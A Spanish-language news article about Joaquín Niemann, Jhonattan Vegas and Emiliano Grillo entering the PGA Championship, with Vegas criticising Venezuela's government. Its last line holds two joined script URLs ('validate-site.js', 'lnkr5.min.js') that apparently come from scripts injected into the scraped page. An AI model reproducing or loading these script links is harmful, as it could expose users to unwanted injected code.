Participará desde esta semana en el PGA of America que se disputará en las afueras de San Luis .

El chileno Joaquín Niemann, el venezolano Jhonattan Vegas y el argentino Emiliano Grillo son los tres representantes latinoamericanos que participarán esta semana en el Campeonato de la Asociación de Profesionales de Golf de Estados Unidos (PGA of America), el cuarto grande de la temporada, que se disputa esta semana en el Bellerive Country Club, a las afueras de San Luis.

El venezolano Vegas, participa este año en su tercer Campeonato de la PGAconsecutivo, en el que acabó en el puesto 22 en 2016 y no pasó el corte en 2017.

“Siento que las cosas van por fin mucho mejor. Me siento físicamente bien y que mejor semana que ésta para volver a tener un gran torneo», señaló animado el golfista de Maturín.

Vegas lleva cuatro años sin regresar Venezuela. “Soy un amante de mi país y verlo como está duele muchísimo”, comentó acerca de los recientes acontecimientos. “Estos tipos no tienen ningún tipo de pudor al ver a la gente sufrir y pasar hambre solo para su beneficio”, agregó acerca del gobierno venezolano de Nicolás Maduro.

Vegas hizo un llamado antes de comenzar su décimo primera participación en un grande: “Busco que alguien que nos pueda echar una mano me escuche y podamos salir de esta pesadilla que estamos viviendo todos los venezolanos”.

“Ha sido superlindo. Estoy muy orgulloso de mi trabajo, de mi equipo y de cómo lo hemos hecho”, comentó a Efe Niemann, invitado por el PGA of America después de su estreno fulgurante en el circuito estadounidense, con cuatro torneos entre los diez primeros.

A sus 19 años de edad, el joven golfista chileno, que participó en el Masters de Augusta en abril, gracias a su victoria en el Campeonato Latinoamericano de Aficionados disputado en su país, va siguiendo los pasos de uno de sus mentores, el español Sergio García, que se estrenó también con 19 años en el PGA Championship en 1999, donde terminó segundo.

“Al principio fue un poco complicado, pero poco a poco me he ido acostumbrado a jugar con los mejores del mundo. Voy agarrando más ritmo y más tranquilidad”, agregó Niemann, que ya se ha ganado la tarjeta del PGA Tour para la próxima temporada. Por su parte, el argentino Emi Grillo llega en el puesto 64 del ranking mundial al último grande del año.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533778342232https://devlinkin.xyz/addons/lnkr5.min.js

Loading...